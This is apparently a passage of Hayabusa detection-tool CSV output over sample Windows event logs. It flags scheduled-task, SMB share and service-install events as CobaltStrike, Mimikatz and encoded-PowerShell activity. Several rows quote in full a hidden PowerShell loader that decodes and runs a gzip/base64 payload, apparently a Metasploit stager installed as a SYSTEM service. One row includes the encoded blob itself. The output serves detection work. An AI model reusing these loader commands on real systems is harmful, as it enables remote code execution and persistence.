0x6fc89e",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.012 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 
C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.012 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 14:56:41.780 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.786 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.818 
+00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 14:56:41.818 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.818 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 14:56:41.897 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 
+00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min 
powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNU
NCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_parent_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 
+00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.345 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.345 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 